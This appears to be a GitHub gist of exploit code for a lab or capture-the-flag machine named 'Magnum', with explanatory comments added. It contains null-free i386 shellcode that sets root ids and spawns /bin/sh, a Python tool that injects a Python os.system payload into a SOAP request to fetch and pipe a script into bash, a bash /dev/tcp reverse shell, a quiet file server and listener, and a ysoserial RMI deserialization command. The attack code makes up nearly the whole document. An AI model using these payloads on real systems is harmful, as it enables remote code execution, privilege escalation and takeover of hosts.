@sharpicx
Created June 2, 2024 03:28
HTR: Magnum
; i386 Linux shellcode (NASM syntax). Two syscalls: first setresuid32 with all
; three ids = 0, then execve("/bin//sh", {"/bin//sh", NULL}, {NULL}).
; Registers are zeroed with xor and syscall numbers loaded through al, so the
; encoding contains no zero bytes -- the usual hallmark of code meant to live
; inside a string buffer. Analysts can key on the 0xd0 / 11 int 0x80 pair.
section .text
global main
main:
xor eax, eax            ; eax = 0; the syscall number is set below via al
xor ebx, ebx            ; ruid = 0
xor ecx, ecx            ; euid = 0
xor edx, edx            ; suid = 0
mov al, 0xd0            ; 0xd0 = 208 = setresuid32 on i386
int 0x80 ; setresuid(0, 0, 0)
xor eax, eax            ; int 0x80 only returns in eax; ebx/ecx/edx stay 0
mov al, 11              ; 11 = execve on i386
push ecx                ; NUL terminator for the path string (ecx is still 0)
push 0x68732f2f         ; "//sh" little-endian; the doubled slash pads to 4 bytes
push 0x6e69622f         ; "/bin"
mov ebx, esp            ; ebx = pathname -> "/bin//sh"
push ecx                ; NULL that terminates argv
mov edx, esp            ; edx = envp, pointing at that same NULL -> {NULL}
push ebx                ; argv[0] = pathname
mov ecx,esp             ; ecx = argv -> {"/bin//sh", NULL}
int 0x80                ; execve(ebx, ecx, edx); does not return on success
import requests
from bs4 import BeautifulSoup
import socket
import threading
import queue
import http.server
import socketserver
# Hand-off between the listener thread (start_server puts each decoded chunk
# here) and the main loop, which blocks on get() and prints what arrives.
data_q = queue.Queue()
class QuietHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler that emits no per-request log lines.

    The base class logs every request through ``log_message``; overriding
    it with a no-op means the server leaves no record of what was fetched.
    """

    def log_message(self, format, *args):
        # Swallow the record on purpose: nothing is formatted or written.
        del format, args
def start_http_server(port=8081):
    """Serve the current working directory over HTTP, forever.

    Binds every interface (empty host) on ``port`` and hands each request
    to ``QuietHTTPRequestHandler``, so requests are answered but not logged.
    ``serve_forever`` never returns; the socket is released only when the
    ``with`` block is left by an exception.

    Args:
        port: TCP port to listen on.
    """
    bind_address = ("", port)
    with socketserver.TCPServer(bind_address, QuietHTTPRequestHandler) as httpd:
        httpd.serve_forever()
def start_server(host='0.0.0.0', port=4444):
    """Accept TCP clients one at a time and relay their bytes.

    Each chunk received from the connected client is decoded as UTF-8,
    placed on ``data_q`` for the main thread to print, and echoed back to
    the client unchanged. The function never returns and the listening
    socket is never closed explicitly.

    Args:
        host: Interface to bind; the default binds all IPv4 interfaces.
        port: TCP port to listen on.
    """
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Permit an immediate rebind of the port after a restart.
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    server_socket.listen(1)  # backlog of one: clients are served serially
    while True:
        client_socket, client_address = server_socket.accept()  # client_address is unused
        with client_socket:  # closed when the inner loop exits, even on error
            while True:
                data = client_socket.recv(1024)
                if not data:
                    break  # peer closed the connection
                # NOTE(review): a 1024-byte chunk can split a multi-byte UTF-8
                # sequence; decode() then raises UnicodeDecodeError, which is
                # not caught and propagates out of this function.
                recv_data = data.decode('utf-8')
                data_q.put(recv_data)
                client_socket.sendall(data)
def execute_command(data):
    """Overwrite the local file ``rev.sh`` with ``data`` wrapped in a bash -c line.

    Despite the name, nothing is executed here. ``data`` is interpolated
    unescaped into a ``/bin/bash -c "..."`` string whose redirections point
    the command's stdio at ``/dev/tcp/my_ip/4444`` (bash's built-in TCP
    pseudo-device; 4444 is the port ``start_server`` listens on), and that
    string is written to ``rev.sh`` in the current directory -- the file the
    URL in ``send_command`` refers to. ``my_ip`` appears to be a placeholder
    left in the template. A double quote inside ``data`` breaks the quoted
    bash string, since no escaping is applied.

    Args:
        data: Command text typed by the operator, already stripped.
    """
    data = '/bin/bash -c "%s >& /dev/tcp/my_ip/4444 0>&1"' % data
    with open("rev.sh", "w") as file:
        file.write(data)
def send_command():
    """Send one fixed SOAP request to the masked target endpoint.

    The envelope's first string parameter is a Python expression,
    ``__import__("os").system(...)``, that would fetch ``rev.sh`` from the
    file server ``start_http_server`` runs on port 8081 and pipe it to bash.
    It only does anything if the receiving service evaluates that parameter
    as Python code -- something this gist does not document, and the
    server-side defect to fix (request strings must never reach
    eval/exec). Host, port, path, SOAPAction and element names are masked
    with ``x`` characters here. The HTTP response is discarded and no
    exception is handled, so a connection error propagates to the caller.
    """
    S = requests.Session()
    command_headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "SOAPAction": "http://localhost:xxxx/xxxxxxxxx/xxxxxx/xxxxxxxxxxxxxxxx"
    }
    url = "http://xx.x.x.xxx:xxxx/xxxxxxxxx/xxxxxx/xxxxxxxxxxxxxxxx"
    # The rev.sh URL below uses the same ``my_ip`` placeholder as execute_command.
    command_data = '<?xml version="1.0" encoding="utf-8" ?><soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:xxxxxxxxxxxxxxxx"><soapenv:Header/><soapenv:Body><urn:xxxxxxxxxxxxxxxx soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><xxxxxxxxxxxxxxxx xsi:type="xsd:string">__import__("os").system("curl -s http://my_ip:8081/rev.sh | bash")</xxxxxxxxxxxxxxxx><xxxxxxxxxxxxxxxx xsi:type="xsd:string">xxxxxxxxxxxxxxxx</xxxxxxxxxxxxxxxx></urn:xxxxxxxxxxxxxxxx></soapenv:Body></soapenv:Envelope>'
    S.post(url, data=command_data, headers=command_headers)
def user_input_thread():
    """Read operator lines from stdin forever.

    Each line is stripped, written into ``rev.sh`` by ``execute_command``,
    and then ``send_command`` is fired so the remote side fetches the new
    file. An empty line still goes through both steps. ``input`` raises
    EOFError once stdin is closed, which ends this thread.
    """
    while True:
        user_input = input('> ').strip()
        execute_command(user_input)
        send_command()
if __name__ == "__main__":
    # Three daemon threads: the file server (default port 8081), the TCP
    # listener (default port 4444) and the stdin reader. Daemon threads are
    # killed when the main thread exits, so an exception in the loop below
    # ends the whole program.
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    server_thread = threading.Thread(target=start_server, daemon=True)
    server_thread.start()
    input_thread = threading.Thread(target=user_input_thread, daemon=True)
    input_thread.start()
    # Main thread: print whatever the listener enqueued. get() blocks until
    # something arrives; the truthiness check is effectively always true,
    # because start_server only enqueues decoded non-empty chunks. Output
    # shares the terminal with the '> ' prompt of the stdin thread.
    while True:
        recv_data = data_q.get()
        if recv_data:
            print(recv_data)
# remote-method-guesser "serial" action: builds a ysoserial CommonsCollections7
# gadget chain from /opt/ysoserial.jar (command argument '/tmp/a') and sends it
# to the RMI endpoint at target_ip:xxxx, against the bound name ServiceMonitor
# and the guessed method signature given in --signature. target_ip and the
# port are placeholders. Defensive note: the chain only fires where the
# service deserializes untrusted RMI arguments with a vulnerable Commons
# Collections on its classpath; a JEP 290 deserialization filter and an
# updated library both neutralise it.
rmg serial target_ip xxxx CommonsCollections7 '/tmp/a' --bound-name ServiceMonitor --signature "String SendProcess(String str, Object obj)" --yso /opt/ysoserial.jar